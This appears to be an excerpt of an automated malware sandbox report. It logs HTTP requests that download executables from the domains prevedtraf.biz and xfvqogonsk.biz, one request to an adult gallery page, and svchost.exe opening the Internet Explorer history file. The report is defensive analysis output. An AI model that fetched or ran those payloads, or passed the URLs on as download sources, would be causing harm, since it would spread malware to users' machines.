process: None
signs: [{u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://prevedtraf.biz/adv/052/win32.exe', u'user-agent': u'Mozilla/5.0', u'port': 80, u'host': u'prevedtraf.biz', u'version': u'1.1', u'path': u'/adv/052/win32.exe', u'data': u'GET /adv/052/win32.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: prevedtraf.biz\r\n\r\n', u'method': u'GET'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://prevedtraf.biz/adv/071/win32.exe', u'user-agent': u'Mozilla/5.0', u'port': 80, u'host': u'prevedtraf.biz', u'version': u'1.1', u'path': u'/adv/071/win32.exe', u'data': u'GET /adv/071/win32.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: prevedtraf.biz\r\n\r\n', u'method': u'GET'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://xfvqogonsk.biz/dl/loadadv655.exe', u'user-agent': u'Mozilla/5.0', u'port': 80, u'host': u'xfvqogonsk.biz', u'version': u'1.1', u'path': u'/dl/loadadv655.exe', u'data': u'GET /dl/loadadv655.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: xfvqogonsk.biz\r\n\r\n', u'method': u'GET'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://www.realfreevideos.com/mt/mwwyg/s4g3/gallery5.php?id=777', u'user-agent': u'Microsoft Internet Explorer', u'port': 80, u'host': u'www.realfreevideos.com', u'version': u'1.1', u'path': u'/mt/mwwyg/s4g3/gallery5.php?id=777', u'data': u'GET /mt/mwwyg/s4g3/gallery5.php?id=777 HTTP/1.1\r\nUser-Agent: Microsoft Internet Explorer\r\nHost: www.realfreevideos.com\r\n\r\n', u'method': u'GET'}}]
process: {u'process_name': u'svchost.exe', u'process_id': 264}
signs: [{u'type': u'api', u'value': {u'category': u'filesystem', u'status': True, u'return': u'0x00000000', u'timestamp': u'2015-08-17 16:34:01,265', u'thread_id': u'1996', u'repeated': 0, u'api': u'NtCreateFile', u'arguments': [{u'name': u'ShareAccess', u'value': u'3'}, {u'name': u'FileName', u'value': u'C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat'}, {u'name': u'DesiredAccess', u'value': u'0xc0100080'}, {u'name': u'CreateDisposition', u'value': u'3'}, {u'name': u'FileHandle', u'value': u'0x000000ec'}], u'id': 704}}]
process: {u'process_name': u'svchost.exe', u'process_id': 264}
signs: [{u'type': u'api', u'value': {u'category': u'filesystem', u'status': True, u'return': u'0x00000000', u'timestamp': u'2015-08-17 16:34:01,265', u'thread_id': u'1996', u'repeated': 0, u'api': u'NtCreateFile', u'arguments': [{u'name': u'ShareAccess', u'value': u'3'}, {u'name': u'FileName', u'value': u'C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat'}, {u'name': u'DesiredAccess', u'value': u'0xc0100080'}, {u'name': u'CreateDisposition', u'value': u'3'}, {u'name': u'FileHandle', u'value': u'0x000000ec'}], u'id': 707}}]